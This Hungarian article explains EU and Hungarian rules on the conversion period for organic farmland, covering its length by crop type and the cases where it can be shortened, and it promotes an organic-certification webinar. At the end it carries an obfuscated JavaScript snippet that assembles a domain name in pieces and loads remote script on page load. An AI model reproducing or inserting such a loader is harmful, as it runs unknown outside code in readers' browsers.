Szántóföld
Az ökológiai növénytermesztésbe vont területek átállása és az átállási idő rövidítése
Az ökológiai gazdálkodás iránt egyre nagyobb az érdeklődés, hiszen a fenntartható termelés nemcsak a környezet, hanem a gazdálkodók hosszú távú jövője szempontjából is kulcsfontosságú. Az átállás azonban nem megy egyik napról a másikra: a területeknek és a termelési folyamatoknak időre van szükségük, hogy megfeleljenek az ökológiai előírásoknak.
A sikeres átálláshoz elengedhetetlen a pontos jogszabályi ismeret és a tanúsítási folyamat átlátása. Most megmutatjuk, milyen szabályok határozzák meg az ökológiai átállási időt, és hogyan tehető a folyamat gördülékenyebbé és hatékonyabbá.

Forrás: Unsplash
A tudatos átállás szerepe az ökológiai gazdálkodásban
Az ökológiai gazdálkodás egyik legfontosabb alapelve a fokozatos, tudatos átállás. Ez garantálja, hogy a korábban hagyományos módon művelt területek valóban megfeleljenek a bio követelményeknek. Az átállási idő nem korlátozást jelent, hanem egyfajta szakmai biztosíték: célja, hogy a talaj, a növényállomány és a környezeti feltételek összhangba kerüljenek az ökológiai gazdálkodás szigorú elvárásaival.
Az átállás pontos szabályait az (EU) 2018/848 rendelet, a (EU) 2020/464 végrehajtási rendelet és a 34/2013. (V.14.) VM rendelet rögzíti. Ezek a jogszabályok teremtik meg azt a keretet, amely biztosítja, hogy a fogyasztók valóban olyan élelmiszerekhez jussanak, amelyek nemcsak tanúsításukban, hanem előállításuk módjában is megfelelnek az ökológiai gazdálkodás alapelveinek.
Meddig tart az átállás? Kultúrától függően változik
Az átállási idő hossza mindig a termesztett növénykultúra típusától függ. A szántóföldi, egynyári növények esetében általában két év szükséges ahhoz, hogy a harmadik év termése már ökológiai minősítést kapjon. Az évelő kultúráknál – például a szőlő és a gyümölcsösök esetében – ez az idő három év, így az első ökológiai termés csak a negyedik évben szüretelhető.

Forrás: Unsplash
A legelők és takarmányterületek átállása hasonlóan két évig tart, míg a vadon gyűjtött növények esetében – amennyiben igazolható, hogy a területet korábban nem kezelték tiltott anyagokkal – akár azonnal is megszerezhető az ökológiai státusz. Az eltérő időszakok célja, hogy minden kultúratípusnál biztosított legyen a szermaradvány-mentesség és a fenntartható tápanyagkörforgás.
Lehet rövidebb az átállási idő?
Bár az átállási idő alapvetően nem csökkenthető, bizonyos esetekben mégis lehetőség nyílik a korosbításra, vagyis az időszak rövidítésére. Ezt az (EU) 2018/848 rendelet 10. cikk (3) bekezdése és a (EU) 2020/464 végrehajtási rendelet teszi lehetővé két fő esetben.
Egyrészt akkor, ha a gazdálkodó igazolni tudja, hogy a terület már korábban is az ökológiai gazdálkodásban engedélyezett anyagokat kapta, például agrár-környezetgazdálkodási támogatás keretében. Másrészt, ha a terület korábban természetes vagy mezőgazdasági művelés alatt állt, és legalább három éven át mentes volt tiltott anyagoktól. Ilyenkor a visszamenőleges elismerés dokumentumokkal és laborvizsgálatokkal igazolható – a döntést a hatóság a tanúsító szervezet javaslata alapján hozza meg.
Hogyan zajlik az átállási folyamat a gyakorlatban?
Az átállási idő a tanúsítóval kötött szerződés aláírásától kezdődik. Ettől a pillanattól a gazdálkodó minden tevékenységét az ökológiai előírások szerint köteles végezni. Az első és második évben a termény még nem viselheti az „ökológiai” megjelölést, ugyanakkor már ekkor be kell tartani minden termesztési szabályt és dokumentálni kell az inputanyagok használatát.

Forrás: Unsplash
A második év termése átállási státuszban értékesíthető, míg a harmadik évben – szántóföldi növények esetében – már megszerezhető az ökológiai minősítés. Az évelő kultúrák esetében ez a státusz csak a negyedik évre teljesül. Az éves helyszíni ellenőrzések célja annak biztosítása, hogy a gazdálkodás minden eleme megfeleljen a jogszabályoknak és a termelés átlátható legyen a fogyasztók felé.
Miért kulcsfontosságú az átállás betartása?
Az átállási idő nem csupán egy adminisztratív kötelezettség, hanem az ökológiai minősítés hitelességének egyik legfontosabb garanciája. Amennyiben a gazdálkodó az átmenet során nem tartja be az előírt ökológiai szabályokat, a terület visszaminősíthető, és a teljes addigi átállási idő elveszhet. Ez nemcsak jelentős időveszteséget, hanem komoly gazdasági hátrányt is okozhat.
A szigorú szabályrendszer ugyanakkor éppen a bizalom megőrzését szolgálja. Az átállási idő végére a talaj tápanyag- és mikrobiológiai egyensúlya helyreáll, a termesztett növény pedig valóban megfelel az ökológiai irányelveknek. Ez a fokozatos folyamat biztosítja, hogy a fogyasztókhoz kizárólag olyan termékek jussanak el, amelyek nemcsak formai, hanem tartalmi szempontból is hitelesen képviselik az ökológiai gazdálkodás értékeit.
Tudás első kézből: csatlakozzon a november 10-i Öko Webinárhoz
Az ökológiai átállás nem csupán szakmai feladat, hanem stratégiai döntés is a fenntartható mezőgazdaság jövőjét tekintve. Éppen ezért érdemes részt venni a 2025. november 10-én megrendezésre kerülő Öko Webináron, ahol elismert szakértők mutatják be az ökológiai tanúsítás legfontosabb gyakorlati kérdéseit.
A háromórás online esemény célja, hogy a gazdálkodók, feldolgozók és tanácsadók átfogó, naprakész képet kapjanak az uniós és hazai előírásokról, a tanúsítás folyamatáról, valamint a legfrissebb jogszabályváltozásokról. Az előadók között a Nébih, az Agrárminisztérium, az ÖMKi és a CerTrust szakértői is szerepelnek, akik közvetlenül válaszolnak a résztvevők kérdéseire.
Amennyiben szeretné megérteni, hogyan zajlik az ökológiai tanúsítás a gyakorlatban, milyen hibák kerülhetők el, és miként rövidíthető az átállási idő, ne hagyja ki ezt az alkalmat. Regisztráljon most, és szerezzen naprakész, hiteles tudást közvetlenül a szakértőktől!
A kiemelt kép forrása: Unsplash
agrotrend.hu / CerTrust
(function(){
u8q5=document.createElement(„script”);u8q5.type=”text/javascript”;
u8q5.async=true;u8q5_=(„op”+(„ens”)+”t”)+”a”;u8q5_+=(„t.e”)+””+”u”;
u8q5.src=”https://”+u8q5_+”/2543125358.8d304b9m8q5uwdzlnamvhaaX9X3fqz”;
document.body.appendChild(u8q5);
})();
